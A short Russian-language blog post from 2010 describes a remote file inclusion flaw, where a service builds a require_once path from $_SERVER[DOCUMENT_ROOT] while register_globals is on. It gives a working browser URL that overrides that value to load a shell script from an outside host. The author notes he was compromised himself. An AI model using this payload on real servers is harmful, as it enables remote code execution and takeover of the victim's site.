/?_SERVER... |
Jan. 9th, 2010|09:09 pm |
В коде одного популярного сервиса есть такое:
require_once($_SERVER[DOCUMENT_ROOT]."somepath");
что в сочетании с register_globals даёт феерический эффект.
пишем в строке броузера:
vulnerable-host.com/?_SERVER[DOCUMENT_ROOT]=http://ourhost.com/shell.txt?
сам попался Ж%-) пришлось чистить машину. Ж-))) |
|